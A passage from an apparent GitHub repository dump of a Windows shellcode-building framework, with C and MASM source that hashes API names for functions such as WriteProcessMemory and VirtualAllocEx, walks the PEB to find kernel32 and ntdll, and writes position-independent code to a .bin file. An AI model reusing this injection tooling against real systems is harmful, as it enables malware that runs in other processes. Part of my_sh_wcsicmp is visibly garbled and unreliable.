    ShellData.xRegOpenKeyA=(TRegOpenKeyA)0xf7be46f9;
    ShellData.xRegOpenKeyExA=(TRegOpenKeyExA)0xbf7df3b;
    ShellData.xRegSetValueExA=(TRegSetValueExA)0xd8c0feaa;
    ShellData.xRegQueryValueExA=(TRegQueryValueExA)0x8a2fc67e;
    ShellData.xRegQueryValueExW=(TRegQueryValueExW)0x8a2fc694;

    ShellData.xSizeofResource=(TSizeofResource)0xd90bb0a3;
    ShellData.xSleep=(TSleep)0xcb9765a0;
    ShellData.xSetFilePointer=(TSetFilePointer)0xdbacbe43;

    ShellData.xUnmapViewOfFile=(TUnmapViewOfFile)0xdaa7fe52;

    ShellData.xVirtualAllocEx=(TVirtualAllocEx)0xef9c7bf1;
    ShellData.xVirtualFreeEx=(TVirtualFreeEx)0x3215858b;
    ShellData.xVirtualProtectEx=(TVirtualProtectEx)0x1a7bbe0b;
    ShellData.xVirtualAlloc=(TVirtualAlloc)0x1ede5967;
    ShellData.xVirtualFree=(TVirtualFree)0x6144aa05;
    ShellData.xVirtualProtect=(TVirtualProtect)0xef64a41e;

    ShellData.xWideCharToMultiByte=(TWideCharToMultiByte)0xcb9bd550;
    ShellData.xWriteFile=(TWriteFile)0x741f8dc4;
    ShellData.xWinExec=(TWinExec)0x1a22f51;
    ShellData.xWriteProcessMemory=(TWriteProcessMemory)0x97410f58;

    ShellData.xZwQuerySystemInformation=(TZwQuerySystemInformation)0xeffc1cf8;

#ifndef HHL_DEBUG
    /* Size of the code range between the two marker symbols; the copy below
     * relies on the linker placing them in this order. */
    dwSize = (DWORD)((ULONG64)Shellcode_Final_End - (ULONG64)Shellcode_Final_Start);

    /* Output layout: code bytes, then the TShellData block immediately after
     * (Is64Os() in 64shellcode_ntapi_utility.c reads it at that offset). */
    dwShellCodeSize = dwSize + sizeof(TShellData);

    lpBuffer = (PUCHAR)GlobalAlloc(GMEM_FIXED,dwShellCodeSize);
    if(lpBuffer)
    {
        CopyMemory(lpBuffer,Shellcode_Final_Start,dwSize);
        CopyMemory(lpBuffer+dwSize,&ShellData,sizeof(TShellData));

        /* Hard-coded output path; nothing is logged when the open fails. */
        hFile = CreateFileA("c:\\64shellcode.bin", GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);

        if(hFile != INVALID_HANDLE_VALUE)
        {
            /* dwBytes is not compared with dwShellCodeSize (see header comment). */
            if(WriteFile(hFile,lpBuffer,dwShellCodeSize,&dwBytes,NULL))
            {
                printf("Save ShellCode Success.\n");
            }
            CloseHandle(hFile);
        }
        GlobalFree(lpBuffer);
    }
#endif
}
683 |
684 |
/*
 * InitApiAddrToStruct - host-side initialisation entry point.
 *
 * Delegates to InitApiHashToStruct, which seeds ShellData with the API name
 * hashes (and, outside HHL_DEBUG builds, writes the .bin file). The call into
 * the assembly stub AlignRSPAndCallShEntry is deliberately left disabled.
 */
void InitApiAddrToStruct()
{
    InitApiHashToStruct();
    /* AlignRSPAndCallShEntry(); -- intentionally not invoked here */
}
691 |
692 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64shellcode.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/64shellcode.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64shellcode_ntapi_utility.c:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | #include "64shellcode.h"
5 | #include "64shellcode_ntapi_utility.h"
6 | #include "64nativeapi.h"
7 |
8 |
//Note: compile the shellcode with the security cookie disabled
10 |
11 | #define Shellcode_Final_End ShellCode_Ntapi_Utility_End
12 |
13 | #ifdef HHL_DEBUG
14 | extern PShellData lpData;
15 | #else
16 |
17 | #endif
18 |
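/*
 * sh_strlen - count the bytes of a NUL-terminated string.
 *
 * str: NUL-terminated string (must not be NULL; no check is made).
 * Returns the number of bytes before the terminating NUL.
 *
 * Fix: the original compared against the multi-character constant '/0'
 * instead of the NUL byte '\0'. Since no char ever equals that value the
 * loop never stopped at the terminator and read past the end of the buffer.
 */
int sh_strlen(const char *str)
{
    int len = 0;
    while (*str++ != '\0')
        ++len;
    return len;
}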
26 |
/*
 * my_sh_strcmp - case-insensitive comparison of two NUL-terminated strings.
 *
 * ASCII 'A'..'Z' in either input is folded to lower case before comparing,
 * so despite the name this behaves like stricmp (it is identical to
 * my_sh_stricmp below). Returns the difference of the first differing folded
 * bytes, 0 when the strings match; neither pointer may be NULL.
 */
int my_sh_strcmp(const char *dst, const char *src)
{
    int a, b;
    for (;;)
    {
        a = (unsigned char)*dst++;
        b = (unsigned char)*src++;
        if (a >= 'A' && a <= 'Z')
            a += 0x20;
        if (b >= 'A' && b <= 'Z')
            b += 0x20;
        if (a == 0 || a != b)
            return a - b;
    }
}
39 |
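/*
 * my_sh_strlwr - lower-case a NUL-terminated ASCII string in place.
 *
 * s: writable NUL-terminated string (must not be NULL; no check is made).
 * Returns s.
 *
 * Fix: the original test was `> 'A' && < 'Z'` (exclusive), which left the
 * letters 'A' and 'Z' unchanged; the bounds are now inclusive, matching
 * my_sh_strupr. The unused local c1 is dropped.
 */
char * my_sh_strlwr(char *s)
{
    char *p;
    for (p = s; *p != '\0'; p++)
    {
        if (*p >= 'A' && *p <= 'Z')
            *p += 'a' - 'A';
    }
    return s;
}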
55 |
/*
 * my_sh_strupr - upper-case ASCII 'a'..'z' in place; other bytes untouched.
 *
 * str: writable NUL-terminated string (no NULL check). Returns str.
 */
char * my_sh_strupr(char *str)
{
    char *cur;
    for (cur = str; *cur; cur++)
    {
        if (*cur < 'a' || *cur > 'z')
            continue;
        *cur -= 0x20;
    }
    return str;
}
67 |
68 |
/*
 * my_sh_stristr - case-insensitive substring search.
 *
 * Both pString and pFind are lower-cased IN PLACE (via my_sh_strlwr) before
 * the case-sensitive my_sh_strstr runs, so both buffers must be writable and
 * the caller's data is modified. Returns a pointer into pString, or NULL.
 */
char* my_sh_stristr(char* pString, char* pFind)
{
    char *haystack = my_sh_strlwr(pString);
    char *needle = my_sh_strlwr(pFind);
    return my_sh_strstr(haystack, needle);
}
75 |
/*
 * my_sh_strlen - length of a NUL-terminated string as an int.
 *
 * str: NUL-terminated string (no NULL check). Returns the byte count
 * before the terminator.
 */
int my_sh_strlen ( char* str )
{
    char *end = str;
    while (*end)
        end++;
    return (int)(end - str);
}
86 |
/*
 * my_sh_stricmp - case-insensitive equality comparison of two strings.
 *
 * ASCII upper-case letters are folded to lower case on the fly; the loop
 * stops at the first mismatch or at the end of dst. Returns 0 when equal,
 * otherwise the difference of the first differing folded bytes.
 */
int my_sh_stricmp(char *dst, char *src)
{
    unsigned char a, b;
    do
    {
        a = (unsigned char)*dst++;
        b = (unsigned char)*src++;
        if (a >= 'A' && a <= 'Z')
            a |= 0x20;   /* 'A'..'Z' have bit 0x20 clear, so |= equals += 0x20 */
        if (b >= 'A' && b <= 'Z')
            b |= 0x20;
    } while (a != 0 && a == b);
    return (int)a - (int)b;
}
99 |
100 |
/*
 * my_sh_wcslen - number of wchar_t units before the terminating 0.
 *
 * wcs: 0-terminated wide string (no NULL check).
 */
ULONG my_sh_wcslen (wchar_t * wcs)
{
    ULONG count = 0;
    while (wcs[count] != 0)
        count++;
    return count;
}
109 |
110 |
111 |
112 |
/*
 * my_sh_strstr - case-sensitive substring search.
 *
 * Returns a pointer to the first occurrence of str2 inside str1, str1 itself
 * when str2 is empty, and NULL when there is no match. Neither argument may
 * be NULL.
 */
char* my_sh_strstr (char * str1,char * str2)
{
    char *pos;

    if (*str2 == '\0')
        return str1;

    for (pos = str1; *pos != '\0'; pos++)
    {
        char *a = pos;
        char *b = str2;

        while (*a != '\0' && *b != '\0' && *a == *b)
        {
            a++;
            b++;
        }

        if (*b == '\0')
            return pos;
    }

    return NULL;
}
137 |
/*
 * my_sh_wcsicmp - case-insensitive comparison of two wide strings.
 *
 * NOTE(review): this listing jumps from line 152 to line 165 in the middle
 * of the for statement, so the loop that converts dst1/src1 into the narrow
 * scratch buffers dst/src (and assigns z1/z2) is not visible here. Only what
 * is shown is documented; the missing part must be checked in the original
 * source before relying on any of this.
 */
int my_sh_wcsicmp(wchar_t * dst1,wchar_t * src1) //wide-char version: compares two strings ignoring case
{
    int ch1, ch2;
    ULONG len1,len2;
    ULONG i,j;
    PUCHAR p1,p2,z1,z2;
    /* Fixed 256-byte scratch copies. len1/len2 are taken from the full
     * inputs and nothing visible clamps them to 256 — TODO confirm the
     * missing conversion loop bounds its writes to these buffers. */
    char dst[256]={0};
    char src[256]={0};
    p1=(PUCHAR)dst1;
    p2=(PUCHAR)src1;

    len1=my_sh_wcslen(dst1);
    len2=my_sh_wcslen(src1);

    /* Garbled in extraction: the text below fuses the start of the for
     * statement with the tail of the comparison loop (lines 153-164 missing). */
    for (i=0,j=0;i= 'A') &&(ch1 <= 'Z') )
    ch1 += 0x20;
    if ( ((ch2 = (unsigned char)(*(z2++))) >= 'A') &&(ch2 <= 'Z') )
    ch2 += 0x20;
    } while ( ch1 && (ch1 == ch2) );   /* same fold-and-compare loop as my_sh_stricmp */
    return(ch1 - ch2);
}
171 |
/*
 * my_sh_wcscat - append src (including its terminator) to the end of dst.
 *
 * No destination size is taken: the caller must guarantee dst has room for
 * both strings plus the terminator. Returns dst.
 */
wchar_t* my_sh_wcscat (wchar_t* dst,wchar_t* src)
{
    wchar_t *tail = dst;

    /* locate the terminator of dst */
    while (*tail != 0)
        tail++;

    /* copy src up to and including its terminator */
    for (;;)
    {
        *tail = *src;
        if (*src == 0)
            break;
        tail++;
        src++;
    }
    return dst;
}
181 |
/*
 * my_sh_strcat - append src (including its NUL) to the end of dst.
 *
 * No destination size is taken: the caller must guarantee dst has room for
 * both strings plus the terminator. Returns dst.
 */
char* my_sh_strcat (char * dst,const char * src)
{
    char *tail = dst;

    /* locate the terminator of dst */
    while (*tail != '\0')
        tail++;

    /* copy src up to and including its NUL */
    for (;;)
    {
        *tail = *src;
        if (*src == '\0')
            break;
        tail++;
        src++;
    }
    return dst;
}
191 |
/*
 * Is64Os - TRUE when GetNativeSystemInfo reports an AMD64 or IA64
 * processor architecture, FALSE otherwise.
 *
 * In HHL_DEBUG builds lpData is the extern global declared at the top of
 * this file. Otherwise it is computed here as the address of the
 * Shellcode_Final_End marker, i.e. the TShellData block is expected to sit
 * directly after the code (that is how InitApiHashToStruct lays out the
 * buffer it writes). If that layout assumption does not hold, the call
 * through lpData->xGetNativeSystemInfo below is an invalid function-pointer
 * dereference; nothing validates lpData or bIsInitSucess first.
 */
BOOLEAN Is64Os()
{
#ifndef HHL_DEBUG
    //perform the shellcode relocation
    // ULONG64 offset=ReleaseRebaseShellCode64();
    PShellData lpData= (PShellData)((ULONG64)Shellcode_Final_End);//restored when the shellcode is generated
#endif
    SYSTEM_INFO si;
    lpData->xGetNativeSystemInfo(&si);
    if (si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64 ||
        si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_IA64 )
    {
        return TRUE;
    }
    else
    {
        return FALSE;
    }
}
211 |
212 |
213 |
214 |
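/*
 * my_sh_memcmp - compare cb bytes of two buffers.
 *
 * Returns 0 when all cb bytes are equal (including cb == 0), otherwise the
 * difference of the first differing pair of bytes, compared as unsigned.
 * Neither pointer may be NULL when cb > 0.
 *
 * Fix: the original dereferenced pv1 and pv2 on every iteration without
 * advancing them, so only byte 0 was ever compared and buffers differing
 * anywhere else compared as equal.
 */
int my_sh_memcmp(void* pv1,void* pv2,size_t cb)
{
    const unsigned char *a = (const unsigned char *)pv1;
    const unsigned char *b = (const unsigned char *)pv2;
    size_t i;
    int d = 0;
    for (i = 0; i < cb && d == 0; i++)
        d = a[i] - b[i];
    return d;
}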
223 |
/*
 * my_sh_memcpy - copy cb bytes from pvSrc to pvDest, one byte at a time.
 *
 * Regions must not overlap (forward copy, no memmove semantics). Returns
 * pvDest.
 */
void* my_sh_memcpy(void* pvDest,void* pvSrc,size_t cb)
{
    unsigned char *out = (unsigned char *)pvDest;
    const unsigned char *in = (const unsigned char *)pvSrc;
    while (cb-- > 0)
        *out++ = *in++;
    return pvDest;
}
231 |
/*
 * my_sh_memset - store the low byte of c into cb bytes starting at pv.
 *
 * Returns pv.
 */
void* my_sh_memset(void* pv,int c,size_t cb)
{
    unsigned char *p = (unsigned char *)pv;
    unsigned char *end = p + cb;
    while (p != end)
        *p++ = (unsigned char)c;
    return pv;
}
/*
 * my_sh_zeromem - zero Length bytes at Destination (wrapper over my_sh_memset).
 */
void my_sh_zeromem(PVOID Destination,SIZE_T Length)
{
    (void)my_sh_memset(Destination, 0, Length);
}
243 |
/*
 * ShellCode_Ntapi_Utility_End - end-of-code marker, not a real function.
 *
 * This file #defines Shellcode_Final_End to this symbol: InitApiHashToStruct
 * uses it as the upper bound of the code range it copies out, and Is64Os()
 * casts its address to PShellData. The build therefore relies on the linker
 * placing this function after everything that must be copied — TODO confirm
 * that link order is actually guaranteed. The dummy arithmetic only keeps
 * the body non-empty; do not move, inline or reorder it.
 */
void ShellCode_Ntapi_Utility_End()
{
    int i=0;
    i=i+1;
    return;
}
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64shellcode_ntapi_utility.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include
4 | #include
5 | #include "64nativeapi.h"
6 | #include "64ShellCode.h"
7 |
8 | #ifdef __cplusplus
9 | extern "C"
10 | {
11 | #endif
12 |
/* String/memory helpers for the position-independent code. None of them
 * take a length for the string forms, all require NUL-terminated input,
 * and none check for NULL. */
int my_sh_strcmp(const char *dst, const char *src);   /* case-INsensitive despite the name (same as my_sh_stricmp) */
int my_sh_stricmp(char *dst, char *src);
int my_sh_wcsicmp(wchar_t * dst1,wchar_t * src1);
ULONG my_sh_wcslen (wchar_t * wcs);
int my_sh_strlen ( char* str );
char* my_sh_strstr (char * str1,char * str2);          /* case-sensitive */
char* my_sh_stristr(char* pString,char* pFind);        /* lower-cases BOTH arguments in place */
char * my_sh_strupr(char *str);
char * my_sh_strlwr(char *s);

wchar_t* my_sh_wcscat (wchar_t * dst,wchar_t * src);  /* no destination size: caller guarantees room */
char* my_sh_strcat (char * dst,const char * src);     /* no destination size: caller guarantees room */

int my_sh_memcmp(void* pv1,void* pv2,size_t cb);
void* my_sh_memcpy(void* pvDest,void* pvSrc,size_t cb);
void* my_sh_memset(void* pv,int c,size_t cb);
void my_sh_zeromem(PVOID Destination,SIZE_T Length);
30 |
31 |
32 |
33 | #ifdef __cplusplus
34 | }
35 | #endif
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
void ShellCode_Ntapi_Utility_End();   /* end-of-code marker; see its definition in 64shellcode_ntapi_utility.c */
64 |
65 |
66 |
67 |
68 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/Debug/64hhl_ring3_utility.exe.embed.manifest:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/Debug/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/Debug/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/GetRing3ApiAddr.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/GetRing3ApiAddr.bin
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/test.asm:
--------------------------------------------------------------------------------
1 | .data
2 |
3 |
4 | .code
5 |
6 |
7 | EXTRN ShellCode_Entry:PROC ;this function is in c
8 |
9 |
10 |
11 | PUBLIC FUNC ;export FUNC function to c
12 |
; Test/placeholder procedure: loads 1234 into RAX and returns. It is not
; referenced by the C sources in this listing — TODO confirm it is still
; needed before keeping it exported.
FUNC proc
    MOV RAX, 1234
    RET
FUNC endp
17 |
18 |
19 | PUBLIC AlignRSPAndCallShEntry ; Marking AlignRSP as PUBLIC allows for the function to be called as an extern in our C code.
20 |
; Calls the C entry point ShellCode_Entry with the stack arranged as the
; x64 calling convention requires: RSP aligned to 16 bytes and 32 bytes of
; home space reserved for the callee. The original RSP is parked in RSI
; (callee-saved) and restored afterwards; whatever ShellCode_Entry leaves
; in RAX is passed back to the caller untouched.
AlignRSPAndCallShEntry PROC
    push rsi                         ; Preserve RSI since we're stomping on it
    mov rsi, rsp                     ; Save the value of RSP so it can be restored
    and rsp, 0FFFFFFFFFFFFFFF0h      ; Align RSP to 16 bytes
    sub rsp, 020h                    ; Allocate home space for ShellCode_Entry (the callee below)
    call ShellCode_Entry             ; Call the entry point of the payload
    mov rsp, rsi                     ; Restore the original value of RSP
    pop rsi                          ; Restore RSI
    ret                              ; Return to caller
AlignRSPAndCallShEntry ENDP
31 |
32 |
33 |
34 | PUBLIC get_kernel32_peb_64
35 |
; Returns a module base (DllBase) in RAX by reading fixed offsets through the
; TEB/PEB loader structures. Which module is reached depends on the loader's
; list ordering rather than on any documented contract, so the "kernel32"
; in the name is an assumption — TODO confirm on every Windows version this
; is built for. No register other than RAX is modified; the per-line
; comments are empty in this listing.
get_kernel32_peb_64 PROC

    mov rax,30h
    mov rax,gs:[rax]
    mov rax,[rax+60h]
    mov rax, [rax+18h]
    mov rax, [rax+10h]
    mov rax,[rax]
    mov rax,[rax]
    mov rax,[rax+30h]               ;DllBase
    ret

get_kernel32_peb_64 ENDP
49 |
50 |
51 | PUBLIC get_ntdll_peb_64
52 |
; Same walk as get_kernel32_peb_64 but one list entry shorter (one fewer
; `mov rax,[rax]`), returning that entry's DllBase in RAX. As above, the
; module reached depends on loader list ordering — TODO confirm it is ntdll
; on every Windows version this is built for. Only RAX is modified.
get_ntdll_peb_64 PROC

    mov rax,30h
    mov rax,gs:[rax]
    mov rax,[rax+60h]
    mov rax, [rax+18h]
    mov rax, [rax+10h]
    mov rax,[rax]
    mov rax,[rax+30h]
    ret

get_ntdll_peb_64 ENDP
65 |
66 |
67 |
68 |
69 | PUBLIC MyShellCodeFinalEnd
70 |
; End marker: zeroes RAX and returns. The C side sizes its code range with
; its own marker (Shellcode_Final_End -> ShellCode_Ntapi_Utility_End), so
; this symbol appears unused in the listing — TODO confirm before removing.
MyShellCodeFinalEnd PROC
    xor rax,rax
    ret
MyShellCodeFinalEnd ENDP
75 |
76 | END
77 |
78 |
79 |
80 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Debug/64hhl_ring3_utility.exe.embed.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Debug/64hhl_ring3_utility.exe.embed.manifest.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Debug/64hhl_ring3_utility.exe.embed.manifest.res
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Debug/64hhl_ring3_utility.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Debug/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Debug/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Release/64_shellcode_main.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/x64/Release/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/ShellCodeFrame_x64.ncb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/ShellCodeFrame_x64.ncb
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/ShellCodeFrame_x64.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "64hhl_ring3_utility", "64hhl_ring3_utility\64hhl_ring3_utility.vcproj", "{BF58DCBE-3F38-4F72-9931-61DB1E52511D}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|Win32.Build.0 = Debug|Win32
16 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|x64.ActiveCfg = Debug|x64
17 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|x64.Build.0 = Debug|x64
18 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|Win32.ActiveCfg = Release|Win32
19 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|Win32.Build.0 = Release|Win32
20 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|x64.ActiveCfg = Release|x64
21 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/ShellCodeFrame_x64.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/ShellCodeFrame_x64.suo
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/clear.bat:
--------------------------------------------------------------------------------
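@echo off
rem Deletes Visual C++ / Visual Studio intermediate files.
rem CAUTION: "del /S" recurses from the CURRENT directory downward and /Q
rem suppresses per-file prompts, so run this only from the solution root.
echo ----------------------------------------------------
echo By MoreWindows (http://blog.csdn.net/MoreWindows)
echo Press any key to delete all files with ending:
echo *.idb *.ncp *.obj *.pch *.tmp *.sbr
echo *.tmp *.pdb *.bsc *.ilk *.ncb
echo *.sdf *.dep *.ipch *.tlog *.opt
echo There are Visual C++ and Visual Studio junk
echo ----------------------------------------------------
pause
rem Fix: *.tlog is announced in the list above but was missing from the
rem original del command; the pattern list now matches the announcement.
del /F /S /Q *.idb *.ncp *.obj *.pch *.sbr *.tmp *.pdb *.bsc *.ilk *.ncb *.opt *.sdf *.dep *.ipch *.tlog
pause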
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/Release/TestShellcode.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/Release/TestShellcode.exe
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/Release/hhl_shellcodeframe.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/Release/hhl_shellcodeframe.exe
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/ShellCodeFrame_x86.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "hhl_shellcodeframe", "hhl_shellcodeframe\hhl_shellcodeframe.vcproj", "{B0E6C01A-2E12-48C9-BB9A-49405143A91D}"
5 | EndProject
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TestShellcode", "TestShellcode\TestShellcode.vcproj", "{4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TestDll", "TestDll\TestDll.vcproj", "{2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|Win32 = Debug|Win32
13 | Debug|x64 = Debug|x64
14 | Release|Win32 = Release|Win32
15 | Release|x64 = Release|x64
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Debug|Win32.ActiveCfg = Debug|Win32
19 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Debug|Win32.Build.0 = Debug|Win32
20 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Debug|x64.ActiveCfg = Debug|x64
21 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Debug|x64.Build.0 = Debug|x64
22 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Release|Win32.ActiveCfg = Release|Win32
23 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Release|Win32.Build.0 = Release|Win32
24 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Release|x64.ActiveCfg = Release|x64
25 | {B0E6C01A-2E12-48C9-BB9A-49405143A91D}.Release|x64.Build.0 = Release|x64
26 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Debug|Win32.ActiveCfg = Debug|Win32
27 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Debug|Win32.Build.0 = Debug|Win32
28 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Debug|x64.ActiveCfg = Debug|x64
29 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Debug|x64.Build.0 = Debug|x64
30 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Release|Win32.ActiveCfg = Release|Win32
31 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Release|Win32.Build.0 = Release|Win32
32 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Release|x64.ActiveCfg = Release|x64
33 | {4DB7FFC3-135E-4406-BE55-4EB8E0B25FB7}.Release|x64.Build.0 = Release|x64
34 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Debug|Win32.ActiveCfg = Debug|Win32
35 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Debug|Win32.Build.0 = Debug|Win32
36 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Debug|x64.ActiveCfg = Debug|x64
37 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Debug|x64.Build.0 = Debug|x64
38 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Release|Win32.ActiveCfg = Release|Win32
39 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Release|Win32.Build.0 = Release|Win32
40 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Release|x64.ActiveCfg = Release|x64
41 | {2CF5FDAD-AE64-4D28-8AF6-3D6D15CD1A11}.Release|x64.Build.0 = Release|x64
42 | EndGlobalSection
43 | GlobalSection(SolutionProperties) = preSolution
44 | HideSolutionNode = FALSE
45 | EndGlobalSection
46 | EndGlobal
47 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/ShellCodeFrame_x86.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/ShellCodeFrame_x86.suo
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/Debug/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x86/TestDll/Debug/BuildLog.htm
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/Debug/TestDll.dll.embed.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x86/TestDll/Debug/TestDll.dll.embed.manifest.res:
